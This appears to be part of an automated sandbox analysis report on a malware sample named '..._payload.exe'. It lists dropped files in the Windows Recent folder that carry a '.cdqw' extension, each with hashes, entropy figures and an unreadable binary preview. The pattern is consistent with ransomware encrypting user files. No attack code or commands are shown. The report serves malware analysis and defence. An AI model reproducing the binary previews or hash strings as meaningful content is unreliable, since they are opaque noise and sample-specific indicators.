                                                                                                                                                                      SHA-256:36E12154174A8AA9FB11B1D2D3AEAC5F6942E0D0FE2EEC27A4049092A7B8CE6C
                                                                                                                                                                      SHA-512:70C5DAC31FA41CE942524F80441428284D7EE1BFDF38ADBCB94BB238A740077C490849A18DEFB45E0AD5D814DE570FC7E468A4DAD2A8B74F11C9652D9765D105
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGVd...s..t..y.!....`\s]..G......O.R\7......f.bt.+.b#.......->#.G.5..A...).r...U$.......L..(,.|..AA...3.K.M..rw+.....DK.E...:\[.z.O..'.........#..6..... ..._.y.2.j pj........m...IV..,.$P\...].....*...-.x...).(.../.R^J.S'...%......5...1....)9.i.H...^.+T..T|...~....Ah..W.........$.<v. ""..0.N......6.W.M..g...3.p...zh...q....u._z....[&}u..e..n.k0..k.50...)...ii...2V.{..M...Gb...>....N...9..'L....C...y..d*:.o.......}.".7\.......6_.....=.L5).N..u..!.....{.......&i.!..'.D.....)W.E.}K...;x....V.$H...4.n....i...S....t....UC.b(_......#..:..i...#...Il.N+.R;...>%.rd.O.KlDj.<.%......0....k...^.2.....|...3...G........)n.k..=.|.B.{......~.~sl.#..`.\.H....RP.`g......d/../..f..4c.b.f/...^...k5u..o7C.&.o.|...2..6O%....S9:.k..f.O.<P...6....a+....H..hJ.Ny..US....aD..*..sk8F.C....^..hN+.9...h.op..f..Jw..7.@.|R.7w4.@...(Q.j...........%..jY.6...........:6.au....Zxm....,..w..q?3..Z:%.....~Z.2 ]!.~.T......yc.z......(.J...&.....t..sB.x .?@m...Q...]..|&V5...b...| M.%%..J.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\IKCRSXYNJM.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865111679950312
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8vvNa+8W8bjltmpOcmCAFnKbWdpTBvfmeteo+CTFvFoqrMQjh2bD:+1J8WAjzeNmCAcbMTBveo5FvEhD
                                                                                                                                                                      MD5:07B611AC44F9845806114F7D8EAAB3E2
                                                                                                                                                                      SHA1:49903FEA54198C000A4B57DFBA64503D5C35AEBD
                                                                                                                                                                      SHA-256:A9BA7AE72B3A62D3F487F3D3BA367FE101997C89634AE32A8732F193500B8C1D
                                                                                                                                                                      SHA-512:69CE820A85BDAB8D6B6498B0A57869C241A428C413335A66F702579A46F8BB64F9F5C853D0C407C73DAC1854DF00F31655670EC6AD5FAA240B417CD469D72293
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:IKCRS.P.......x.J..L?.X.)P.../.E......s]..B..U.....o...... .......<....S.GJ...h..'....MM.=<-k.....4.]@.^.....k....Hss.D..x..2...X%.W...-....0..y\{c.$o..._.r.<..>..;.%./.I?.N.......L.>.f..;8.]$..m}......&...Zu..a9..k...S`*.f..V.......B%....Q.Ua.c..0S>.%...T.K.....E.....^h>..Gl........j.....F.Yig....L..BP-z|.hV...S^.....&...z..."4B..M..|.B.:...7......WI0..t......W.B..."S]K.*}r(1.}..6{.X.c7../,.....d........>h]..Y.2.~.'M.......OIJVr.A[..Z....b.....;..{.^.sI,.M.K.T.Z....K.m.M..Y...7.m>...".{...'...o]...6.%eL..=...zV.....y.R"...b..j9ugx.F.)..2..... .,..6Q...vz...|..`Y....z%.q?..[I...).....J9...1.)...J~..e......k..[UGH. f.8...h.~.#..*...U.*...s.SV...t.~.sW.h.;...Z....Z.&..R.?..7=...x....!.K..........H....>.+!GG.^j.%..=.w$.B9:..l+d....\_.A..w.|q..w.b.C.B... .;.A...l._..H6E..MX.E...8..7@.g&9....{.*.X...Q.|T.~F.%#I.&}..s.a76..[.1i..g.U.m.?6|@....."./..{-....m.@-.-...v...s..NV.......&v.......65.....d.... [.............Yq.....3D"F..]a.u.T.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\IPKGELNTQY.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8340888716771175
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:MiyLhCOWj3verA1qWD8/JyKr64r3gUNWWy+GpG0OhZykISorYCtBNPM2bD:MiytC/verAEWp23MWyXc0xk0rVtB1fD
                                                                                                                                                                      MD5:D83CD7923F01B1D5A63758F1DE9152DA
                                                                                                                                                                      SHA1:09562BF077EA16670CCA33EB1DD2D791DFAD9400
                                                                                                                                                                      SHA-256:E27A574E1A5839F4A2533A34D0D8E7EC692D782E4F673309DD6B08402FC94FEC
                                                                                                                                                                      SHA-512:F5398580C55832C54FBB9D4E360CB1AFC4BCDE71746DC7C32B0776821DBF79040E1AD0E3979AF9158FBDF767ABED243A0310F39FAFB0558A492218FA1727D677
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:IPKGE...t.N....7.\..@%...i.....uk..(.T...Y....:.S/.....e..F ...?$..n...l.3.4o.g.c.4.....P.x6..x[.f#..2..0....2....p.*......O.k.i9...zt;.a.....I.9.U.c..5...aYlo...Tf.m..-.H.V.....iwU..MR..P..B6.@.Y..YQ.&9..I......#....?..sN..3[u.}V.......8.L..9.^.TM$......m.....A&...#..x..Sr.c>.#.{I.......m=9..M7l..`.\........a./..h..L.8..ST...j.W(.*..#|.n.".Trt.B+....`...>...tW.[~,i.,.)..?.6.].....k...J....../..!1N:b....p]rT.....iO.V..g..5..E...u...S.2).AmN9.G!.....`&1..I..v~...pz......m....LO...S...Q+...&}.K.HPD....C`....,.H..m.P...ei.ZE <..H.Vw4.".q..(..~1..<..~.{...<...j..`.T..d.E.........8...e...I..c..E>..;..=.)......4U'.5.'...t.V.:..d..V+..h..o;<..;..o...6........'x.ex...4..Pbu...[..A..l4........k`..N..q.....0....?..E..V...-....7.O.q{....L:.0..P....~X.....4..P.sG.{...z.0Pm....$u0.."..#_q.5'U...Z..t.3..8G......}...ZF6..p...."1fOe...3q...{..E.Dv..QU..a2..2......NA):......i.,b.dB..y...),......c.....Qd....i..o..[.*oWV..w.wB.dA...>..8.#..7$;...f

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\IPKGELNTQY.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8626290067470945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3IaDZTz8DRvBT1iMz2Wr1FlxOGi1YwibxtBzjvnk62bD:3DdTz8d91ig2iFlxOgwiFD/vnkxD
                                                                                                                                                                      MD5:7726C73671AE0D8263BAA5B9F3811DD8
                                                                                                                                                                      SHA1:7A89F1326CA4A7591D7651E4366E508E75350C9B
                                                                                                                                                                      SHA-256:A285159B9C78E00D7B92B01FC1D7FBCD55947477216DB5692EDB60A995C2F28C
                                                                                                                                                                      SHA-512:21D3BEFEBFC3063106D96940E3491BD4ABB7FAAA840A92E6187E0B1C1782EC1EDAC7E2ABCDE7CA74506B2CB99D432B26B84145E8F04DB2FC9F86CA7F54665BAD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:IPKGE..r.h......^...3...H.......j..R..:?*%.=..../..A..g..i..n.pD.#..+.(8.....-..U..1..;~....E.w...sG.^r...cQ4..5.2.,<o...L....y`....a..g...F.q._.-i]..C.....'.+....aB.y........`.3.4Q.fy=...:....h.a.m...-o.l...8>e..T....v...T.......^....1P......_.^.>R.v`..Q.M...X.M..IK.. w.?..%J.y.lY.f .................Z.e...#.^.;o=...a.0..%.~%..{Bv.don..;.&.....).z.`.-+%x...y..^...s...W...s.mp..}.E...k..WR.....iA...UnD..]O..m....C]y<*w.V.8..}&?......S.y..v#s.....V.*...6b...Z...V...Gx.b...j.-7.4.G.3|j.ao.......r.i.o...'..;W.....]....[...J..D..4.]A.T.p.s......f.....J,..h.8h^..p9[.U#/.X..0..t....E~.5......L........P.jT..3.....d..S......j].|.D........R.'...~s...Y>.f&T..o.".....jq.&.9.=a.....\...)i.(`@.....@........y..~z..{.G9... .@..ak..^..P....)..&..R.......`.t}Y..rax..[^(v.?.!f.........s..T.u.I ...dj.....Y.......W."w...<s%.W#..../.u..<...].%.C...b.6<...>.Q.3..C.L7.[...;I.]S..;._|.b.|..n..n#............F....H...X...r.L.U-bJ.d.....O..<....9.5E]..'#......

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KATAXZVCPS.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8548497522179135
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3aaJYJXsNNTw4HYlBiDa/swjlLMP9qEkYMqyVsEG3VIwHluLoCyXPEk9GOUKFjKu:3agYJXwWJ3s8l29qENwI2HMxbGGFeHWD
                                                                                                                                                                      MD5:5FFDDA2BD41E3C0E67A12757F13642B0
                                                                                                                                                                      SHA1:0E873C6EB7338D5941191E54116C965E493C95AB
                                                                                                                                                                      SHA-256:4701216BBC1B23400CF5B549311F0193E9D4B46BDDAE43239F1F91C4AEB3CAE0
                                                                                                                                                                      SHA-512:9BC0A9468D3A11702FFDCE6B55528FC1334E86B9BF145209E51710BC5A1356A3B6B58EEE83E7563B6EE60AC799B13D645E6AE7DEC85CF216107830D0B4EE7BFA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAX...go.7E".........>..,............:....|.3L/.B...X..UN...+.F...+..Q.......rY. .t..z...A...w..l....1C........._hh.A..Z...6............hL.).]7....x.....Z.m.%..?m..../..c].xo.....Mi.........dS...]P...9....J....9..c....AR!.!...w....`......Q..@)...G.-..e..6....X....|&2'.A..kZ.h..~.. ......Q.o.g.....b...)._..B-T.[\.y.....%b.G.].h..k._*3T.r....p.1.4.[......[.{L.|.q.6 .....^.....5.H.aw..r4.-.pF.....%../.!..z...,.vs%a.....N.n"Yq..";..l.{.P.]sB_.4.j.>%H*%.......H#...`XC(2k.*.>(..../..`3].F,N....D.$}.qu..:on.....R.T.L7.{.h<...y.O..Cl"XD@E...*T.3..x.d..+....l.w......@1....zoY..O.....^W...u!..S..p......V...'u.dn.z.9..{O.n3FoFs....W.p .....BY......V..e...T..+....x.yd.O...4...9.b..JP...7....L.7e...q.c..0'.}..t.....}!...,....=.......i.W...8 ...m..K"H...Pk...:.xY.k-....[<......k......i....L?.F.....|.).aa.$...(..k.r.{.9.>*.FM..-2.T.X.cEu.h..7...nA.w.......H1......H.Qz>.a{&Q...ou{4.VB.....@.?....%..K.a...>...Q..t.v..:..`p.....%. ..u.\......K.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KKCTUQOTUB.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.867130928739586
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Txc6cDEwQjwLzd1v8lSq/DcxolKXaLZdzIangeZdg0l/y2bD:FQE/wLzd5mcq2aLZdzIage80/D
                                                                                                                                                                      MD5:8865B5E408C3C789B36A7D9CE21D05FC
                                                                                                                                                                      SHA1:C91C48830449ACDD1227A42CD0A67D7373577109
                                                                                                                                                                      SHA-256:255CAA442E7C9068D1155DF58C75FBA6DC78B499AFE18E7D6C848DBAEE0EBF77
                                                                                                                                                                      SHA-512:8964138226663E3A376D2E04B08E88BC881E9226C156980F8E88F7022D199D8FBE08DE659A8B0EAFA5E689F4007E8157CF8418E9C8C5077DA5EDCDBB225D8DDE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KKCTU.Ex$?.@..k... .F..d%{@....#.YN....q`.]....j.....Y-..d..,R.!f.2j`3v.,.. .......61UE..N......F4.&r9|..../7..l.>.v....>g..&x...?`k..t..z..n.O....&Y...&v..3ZfM!....s.M...OE..".M)n...!.. ....c~.............Gy5...*.........,A|\.~..i.bK`...UP.6.q......*},Lk.,..........3]=...k.On.T.S[[..J.?1..m.-....y.1VG..V.X.y......5r .:n_...;.CD}.Q...j)F0jB....H .3..r.R....P.._."..s.F..1..>..f.Y.).....rb.a......4........(.VK...;F.c.px=h....u_L..Ev.z-[...2...;a7A..v......)7......E..H.p..n#+V...9.p............0/.@=.-.+..r..(.'.B.......%[p.9i....b[C^.W7j....?..a...f....%.A^..AV..?.....Bn.t....b...zK0J.......;o..?....Z`.....<...b.7.[v....K....r.-......h..c....gS.&..&l....l..J.c.3...+..)Q|H.Q.K,.lH.f.5A.h1..!z..........(.^...b......0.....\az..-...L..+.z....#B..q.....U.!..!..q.3...........Z...!.5...`...6Y.2..n..f&\4..>...r...n..5....$KQ..qUD.H.'...I.p.x.%.v..j...nW,.iLc...m?..(f...6o...b../..V..`i..I_ML5].q...L...u..5...3.^;......yw...W.F.c.XWq...TT

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.843847884081807
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ZRBc45M48vFd6IbsGYIWIjNYnIWnXET7gRPqefLu+olKnMD8Sb6PpCh2bD:Z4QHgF4Iwl3IKnGMRPvjurlKnMDrsRD
                                                                                                                                                                      MD5:6ACDFAAA4041B469A38998CCF55E3A63
                                                                                                                                                                      SHA1:1FFCE6B3D9917B7D8D9A080B2A9623EB1FBAAC4A
                                                                                                                                                                      SHA-256:7EF09362FFD83CBD9992018299DED4826D300186123EEAD7E6F1F7379B4D150E
                                                                                                                                                                      SHA-512:9501AFAF77C4A07224E2150DB6F3CAE9AE024B7E0141F84FC7C63AF975EFF61563646D78C9F982A1388F8B6A34978CCD265EB3E9AC9F317F805EF32D8F91732C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.k.y...o.{r-5..G.J{.x...Lw/.>.,i..O.L...rD.1.)....Ug...,W.4&..|].7.P\..Bzi.]b.....v%..p.bB.9..QB..wI..>..S>X1t....Y....Gb..l.O..e...N./...T..h....dUj...@....!.`.I....1.)..#..P.!}.p2..9w...s)..K..(5.@.....9.|...;w.&...0....O...~...?........X=.v./J2...L.$..7.Q.g.....5.....^&H......'.F....6]E...|..c.E30N.<3.z...O{<......~.J.K...g..c.d.ym.....{.a..S.9u.T...oM9 [...pO.J@..g.W........^nx.'........:\"`z.`..2.|i......\Gw...U+)-Hs..F..6};A......'...:.xMT..z..6.%..Y&....p..}.gT.e.I......U..xqR..*,......9...;...V..,... . |....E../..T&`.........#..a......rA;.....I.?....+.z..qD.#..+...i....3[,@Ez.....M.*........Vg...!.5....._(&@.g..'D....(.C..Yd=.VX.[r..Aa%...|....).5....A..'..u[.8..l.....<w.8.F..?..G.Q.GYd.o.5T.....cV........&....[7..?H...o....S0W9...W..r....G\...R~.e...r..... UaN...\.>B..y...iy.0..2.....~c....#m......rfw..l.~Q......q2#+u"....u.B....OI....i.qh.KN...iX.&.&..B...]$.....J.n..#.....0... !.4..R"tI6c^...%.lry..2.J...X.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852757006082319
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:p0mSm6Ss18tqyDXfN9xs/qE2QUvUpMUWprrvfxq9RI/3wHnUiJQA2bD:pTSg48tqyD/xs/qE2TUpv2rrnc7Y2iD
                                                                                                                                                                      MD5:DEA071C611563AE2CD4167E46D5D85DB
                                                                                                                                                                      SHA1:D3590A4DCA4C64C528A16B3A20B02C799DBC3266
                                                                                                                                                                      SHA-256:E78103C7447AD49755EBB5688112A90E87B75C38452CCB4D3F3D61B19E64DADD
                                                                                                                                                                      SHA-512:B502466E3219C9D5B2F0A9ADCB19E48055BDA6F508576A2008CBB55C7243723FCA241B7EDAA183A35597F5B112372C9E708AF31C8F687FBE821A734897924A47
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN..*q.@.wE...%.. ....^[~fY...VTQ.....]..iuZwo...m.....d..@p..@-......~....k.....B......b.A.B..{.=..(.t4#.c#M.V/\g.....|......,.V.....;un..dO..5...K....[*....D..&o..FG;..B)T.XC2{s.ZNm%.[......MsVS..Z...c.},Fw6...!..WgY....c.i.......qbv....U.l.2.A...N.......yq.+r..w.f.q.1.;....R.q.UE|,.c#..9..`(.DE.........2y.,.T+.....5...{......Bh/.....W...x..]....$....\.Wg].]%.1..|....Y...+...9.;.*........VMd.gF.6.$tK...ed0...n]..:J.'GM.c.va...j.?.....:.[d...sX7.s.+..B.L4..b.f..O;.TE.E<:.4..U./$1..h.......+8......Xn.m.{.I..x.R.3rT..1......5.=t...e...`..<.F.$....a.S...k1i..U..V{...a,....g.}..o.P>...a......."......P&.9.^.rNc....9..8.:T|.b,..^.J_...z..E..#.6..i.(....J,._.v....J..*'_..s.;.......S.N....ciI.....C..#l....m....7-.Fa....e1.k..p.O.....(.h./|...W..L.c...X.....#..`....w.:.*.;.Y.*S/.Eq.(..`..+..O#...PzLn8o...Bb...i.......7...Vx.M.f@@.....%hL.F..,..Z.1H.....J'.{..cV....>;m..=.....7..@...&iD.ZD7C..i.n......B...8S.........m..1dC..uW...L{...5..=S,4.).

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85194352602126
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:JZKKqG0SweJIZVbr65oS+a9YYKFCNbxwIgcojP5sCpuUN4WJ22bD:rqjiH+a9nkAT+P5sCpuUN4CD
                                                                                                                                                                      MD5:EF48D49818275E639E44549E2126B743
                                                                                                                                                                      SHA1:2A08411DEB1F73B55EE17C1BAA7AB34E87A85171
                                                                                                                                                                      SHA-256:D84B2C3A2A09A301902F5D41D4F43BEC9FE8E41444BFEE1859E27E17DB0A2051
                                                                                                                                                                      SHA-512:17647358C42A3D73442D3D3680DAC99953ECC9619DB3C912D22AED743A063639000ACC26EE6B3378B6E377A2B628D34408817E26AD72A7E6C26AB114091F4DB8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN..\....(....S..._.....m..#x{.&.G...zz..f...Y~..ubz....C.....tq|0.o.r..J.6.V...O.".;..&x+...x:.)..;..Y.:....#...Q.....?R......Z...N%...].m.5}/F.......e...k...b.......7..dr...!LX.S....@.%...|....i$+Y.a#..[....3..0..,/..\A4.~.wq../._.r..^UgL9.s...5. 73l...._.B.v|.uo^........$LW....,.5.s...c..2v..3.7p..m.....T...............6..-..i5./S..\.p.6.]O....w..C..K_..K......1.~-8#....q`..@..nuC...vk|..6.?+B.Y[.]..Z.Q......|.I*?>..7!@\..A..;.....t.+{......c.X..^..cgr."..y%.R..}...>l!...~...z7I..Q.*...Wq4?X...:....;._}..P..y.?.#).....}?.....x#.......$."[..(C..F..f.`..o..Nxt.1......f.T..(]...I...F?.......C.....'.,.....d.8.$.l...[..l.$y......B[...q........|h.?..sC$.I......~.j.....P..t.P.`'.....k..l.x..g.#.`<..\...'n......%~G......eK.^.S..A.Z.Dox.)g.Dc..j.......d.=.O.C...)..Iq..N.Y...m.#.6^.!....;.@..U....'G.,...JC.F[....f_k[..F/_. ..E.....j.l.....U.^.8%..M.-...2E.Xz.....~.....D...,.vm,...[..W.R.5..C..Z........x.....z......K......HH].#.*^hy.fr...:^@

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\LTKMYBSEYZ.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.827434195974106
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kX9t3ZwaE+pow3d+YMkqWnpYdAOxxslzRSiBrsF3CLWtlbvNn7eQ7PJR2bD:k73ZMpYMk5pIzxslzRS/SE5NqaJqD
                                                                                                                                                                      MD5:F323E5B7BA97BBEE0D1D7BEA3F8722E3
                                                                                                                                                                      SHA1:2DB90527A52E2EDEB7D09415FCC22598FF649CFB
                                                                                                                                                                      SHA-256:C2F56F57A884CBCC254ABA1F6681D8C3F0F81623E3B25AA4263A77BDEBE8EF94
                                                                                                                                                                      SHA-512:7EE376CF02B23E4C53F8067BF9DB96C16939A02833C3CC525E6E413B19356D36F28414DE5A7055DF06C1F8610374DF0CD87049B9434FBFE29BB4BC80AC2DE314
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMY$.l..!...3a..Ic3..H.5...fU!.y..v...}7l.gd.b..I.....1...K7.E....4.F|,.$C.C..8?..7.Q........%..JVI$....@b...&-.....+~..+......&.( ...n .o .l..C...x..=.:......!.5....J#u..\.......#.....-1."..d.W2....n.X.k.K....M2.....y....5.....wf ..9U.v..{M..Ln.}.$tO ."...(.G...Tg..14..SB.f.Y....#.../k../..j.0K..=.c..Y...*...iX.k.......:.1mN...n.....V.....o.g..*.G..Wwo.6.Ay..Qe........8I...$.]X../+..p..1..i............S%Rq....-'c.(f..=....;,.w.A.W*...3..L@ \...E.w!...}7...CQ...P.n.e....%...... ./.Y.....M.U.L...?..N...J.io..p.02.....L..4.......!.?sp.....A.+.L.....g..x..e4..h|....w..e.M.a.S..F..@`....e....XCk.c./E.C...]....H.~.)8{ok...=.mt.Q.:.>.)...I\..|.>.....s\Q.m......M%....^..D9DB..]p...&..1b.........6..*..l.-*!...Y.F.]I.@.s`.#J...`Sq.Cw..[[y.!-...Gfe.y7....d.....Ds...!,.1c.8U%..^C..x5}_.!.-.r.3..L...1..{...(.s7]-........S.)dO....d..;..3.+r...}.Yz.....D..\=E]....!..R..}..F..t....G(..+.{._...;H..7*t.......1,...\..I|PO......?#>../z6p.S^..a.....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\LTKMYBSEYZ.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859001799386856
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zhuga0W/dCKH1P0+u+qehEhsMTdrb8Lknn5V+EPO9XtWaoetV2bD:Nuga0VKH1Vv6S+J8Lk5V+TLWzeID
                                                                                                                                                                      MD5:A65D920A6B07295D5415D507A81AA89E
                                                                                                                                                                      SHA1:7FFDB3A3C9BD29C52896FB0158249E09EEF8D69D
                                                                                                                                                                      SHA-256:A30228407EDC90B91EA73153C8864281F6D7B9463C80B3918EDC4F208F4C7B21
                                                                                                                                                                      SHA-512:D86D92756A3DC738825A727F99C79E796FF317E0E003FC62244D28B120AD03919F2D3BE9FA78BE77D112458F385C1BDBD962AE4B6EC9F888321FDC8D85F8E254
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMY...R.>.Nw..".V...%}3.......^.......x..-b...W../Ss.7..PHo..q|4t..(?;w..%t.H...,B&.^..0...?...,..Gq7q..6K...B.....t.P.p..'.T4....W.....W.:"..........s.].n...Z.mqy..K~.8.G;.[K..'..W..8@...x(S...&[.G...<..}ig....sh%./1.<.h.~)..G$.....}..ZI-X..z...$.Y.%.z.C.=!>....'.....P.HZ.H...x.0ZO..@..M..._b...._....f..;..,.C..5..d.......E..fc.U.:y..}b9....4....>\.4..m....._.6.y...z:..R.m....^...&uw....:..),.. .qDK....f.&..j.........d..)...Y..m....I;.-*6....gH}..dHX."j.x..... ...)n..Z....Y.)ygr.e9&...B.......~y]......8H....R.mV.dJ\.W.|[.....[B.BW.!.d.C.V..a..v..m..(.......t.c..8.....A..B..w....-.qMu:.=]...:....2...L...-.;.,..n...Z..u...#~ 3..z....e...9i...e..........p...$..!)...[U.X._...&...tHD...Z.....E.4.^........./g..bK..<l..c..OS.."Uh.I..VQ..B/f?.. 0..W@..5G%0.B..B..._G....l.c...<...S..wzS.^..3E,.^...T.......(...D.lL\...!l..i....wSd.X.x.i.*.B<.c.#..v..?X.x....p.(}."....Y}f.(..R~}.2...z.....^k.0...f8V=u,d.gQ4..."..K.|.x....#......q.N....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\MVLAMAIDGQ.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.809466468019772
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cT950qT26Ql8Hs1SvjPs+BTo9npGga5xoLjFZ4s9sjjLXPWI1ks7j7UmQY3dVtYq:cT9NT2NBujPs+BTOprn/b9OjmuXQWdV9
                                                                                                                                                                      MD5:B16E3818B90019DC4E343CE45EBF868B
                                                                                                                                                                      SHA1:62A0A0E9E759E8389D8039068AC52D314248F1EE
                                                                                                                                                                      SHA-256:7BF5B775B234189077ACC100420BD82B1666F31D8DC7F39C76C0A565B46D17D2
                                                                                                                                                                      SHA-512:AD94BFE44241B2B685B1779EC1F14F3E6CA44EF95EFAB055E4048EC967B3A0B1E6F71F628EED1EBFA9402969D9A120CEB763F4397A067D31132022FD573A55CB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MVLAMB>....&w.A........8I.O....\_.L.r..lk.;p..\e......:...x.N.{I...?.1*....!.`sZ..ko..c......H..W....k....mV..o..ni..N..!.....I.........X<o.o......Gg..M.4B....|.<..P.U....i...X...|.-F.E...i.Zx...YE#_..9.:....2.c.A..8|..HF..'Hv.....g._.....cd......:..Q.&.#.(.1..4i.....E.l.F${....Y9.a.X......U..w........!..P.p/D..|.[t}..<B.p.....g....V...y..a.u..y.p...a.1V.?..z$.Z.I.dMR.B...4}N...l.5H.Q.3..^......).`.....m._[dK.7.........,Hs...;..#kVH{...u..".d...9./...7..-...(......q0....~..1i..!.......Gh.e....P...N..... .T.....I!.t...]...Y.?Rx.."...~p.k.2......k.HZvc..7HU.E.t.</.`|Y...#..9....:&.[..>.P.I..p/.8d.F.Y..0.$..I.qg.1H..-.d..!.An$H.....Q...I[..eV...v..3...8..-^.:N....l..P._....bl............Ize.k..........4..1k|.....u.......j4..../1.GV0/8.^.P...,...5h....S.O.0.E.3..5....X>.Nl....'..v*O...cU...O..m....oEie.......[.kd.q&xm.L....p..U..vc....$..l.C.Vq.F....[....1....6.v*2.,Z?,.j.....r;w~.2:..Q.URyL..{w".l/.ar..N>..YsGq.....p.a..N&.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NIKHQAIQAU.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.858425826062463
                                                                                                                                                                      Encrypted:false
